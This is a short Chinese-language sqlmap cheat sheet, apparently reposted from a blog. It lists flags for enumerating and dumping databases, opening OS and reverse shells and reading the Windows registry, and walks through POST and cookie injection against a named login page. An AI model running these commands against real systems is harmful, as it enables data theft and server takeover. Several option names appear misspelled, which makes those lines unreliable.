基本用法:
--dbs 查询数据库
--current--db 获取当前数据库名称
--current--user 获得用户
--tables -D “数据库” // 列举数据库的表名
--columns -T “表名” -D “数据库” // 获取表的列名
--dump -C “字段,字段” -T “表名” -D “数据库” // 获取表中的数据,包含列
–privileges / 查看权限
privileges -U root / 查看用户权限
–roles / 枚举数据库用户角色
--proxy "http://127.0.0.1:8080" 代理注入
--sql-query=xx 要执行的SQL语句
--sql-shell 提示交互式 SQL 的 shell
  --os-cmd=xxx执行操作系统命令
  --os-shell    交互式的操作系统的 shell
  --os-pwn   反弹shell
  --reg-read  读取win系统注册表
  --dbs-o "sqlmap.log" 保存进度
  --dbs-o "sqlmap.log" -resume  恢复已保存进度
POST注入
  1. 浏览器打开目标地址http:// blog.websafe3.org /Login.asp 
  2. 配置burp代理(127.0.0.1:8080)以拦截请求 
  3. 点击login表单的submit按钮 
  4. 这时候Burp会拦截到了我们的登录POST请求 
  5. 把这个post请求复制为txt, 我这命名为search-test.txt 然后把它放至sqlmap目录下
6. 运行sqlmap并使用如下命令:
./sqlmap.py -r search-test.txt -p tfUPass
  这里参数-r 是让sqlmap加载我们的post请求rsearch-test.txt,
  而-p 大家应该比较熟悉,指定注入用的参数。
COOKIES注入
sqlmap.py -u "http://127.0.0.1/base.php" --cookies "id=1" --dbs --level 2
默认情况下SQLMAP只支持GET/POST参数的注入测试,但是当使用--level 参数且数值>=2的时候也会检查 cookie时面的参数,当>=3的时候将检查User-agent和Referer,那么这就很简单了,我们直接在原有的基础上面加上 --level 2 即可
原文:https://www.cnblogs.com/pangya/p/8915692.html